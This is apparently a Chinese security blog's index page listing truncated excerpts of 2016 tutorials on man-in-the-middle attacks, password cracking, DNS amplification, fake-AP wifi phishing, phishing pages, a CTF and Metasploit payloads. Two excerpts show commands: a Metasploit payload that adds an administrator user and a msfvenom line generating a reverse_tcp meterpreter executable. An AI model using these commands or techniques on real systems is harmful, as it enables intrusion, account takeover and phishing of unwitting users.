Eternal 8年前 (2016-10-05) 8784浏览 1评论

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装，在之前的版本有安装。 首...

Eternal 8年前 (2016-10-03) 7755浏览 1评论

Medusa和hydra一样，同样属于在线密码破解工具。不同的是，medusa 的稳定性相较于 hydra 要好很多。但是也有缺陷。它的支持模块要比 hydra 少很多，也不支持 rdp 服务协议。同时，它的表单破解也存在着问题。但是不论什么工具，我...

Eternal 8年前 (2016-09-28) 7680浏览 1评论

前言： 今天为大家介绍DNS放大攻击。通过DNS服务器的递归查询，我们可以利用少量的查询流量，来获得大量的返回数据流量。该攻击方式需要结合IP地址伪造，同时需要DNS服务器支持递归查询。下面我们来看看，如何实现攻击？ 0x00 首先，我们用 scap...

Eternal 8年前 (2016-09-25) 33721浏览 1评论

今天这篇文章和大家的分享的是，利用 karmetasploit 在 kali 上伪造 AP 进行wifi钓鱼。首先，简单提下什么是 karmetasploit?？Karma? 是一个无线客户端攻击工具包和 metasploit? 被称为 Karmet...

Eternal 8年前 (2016-09-08) 6397浏览 1评论

今天，我们将完成一个噩梦般的 CTF系列的 root2boot 挑战！?这次的挑战我们将在 Sidney: 0.2 系统上完成！我们可以从这里下载到该系统：https://www.vulnhub.com/entry/sidney-02,149/?。记...

Eternal 8年前 (2016-08-28) 17225浏览 1评论

今天为大家介绍下，如何用Kali启动盘，来破解Windows登录密码。 首先，我们下载Kali的ISO文件，并用制作工具将Kali制作成U盘启动器。在这里我就不介绍制作过程了，只要按照官方说明就能轻易制作。下面直接进入主题。 将制作好的U盘插入PC ...

Eternal 8年前 (2016-08-27) 6503浏览 0评论

今天为大家介绍几个MSF中比较有意思的 PAYLOAD 模块。 添加用户到管理员组： use windows/adduser set user secist set pass Secist.com set wmic true generate -t ...

Eternal 8年前 (2016-08-26) 4650浏览 0评论

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面，来窃取用户的信息。下面我们来看看，如何使用该脚本。 首先，让我们从github上进行下载。 github clone https://github.com/Hypsurus/weem...

Eternal 8年前 (2016-08-25) 8286浏览 0评论

微软的“不安全dll加载”漏洞涉及Windows XP至Windows 7等多个版本的操作系统。由于Windows存在加载未指明完整路径的dll文件的机制，可能导致用户在使用第三方软件、玩游戏、听音乐时，会加载由木马 病毒伪装而成的dll文件，从而让...

Eternal 8年前 (2016-08-21) 6597浏览 0评论

首先，我们先生成一个 PAYLOAD ： msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着，我们来...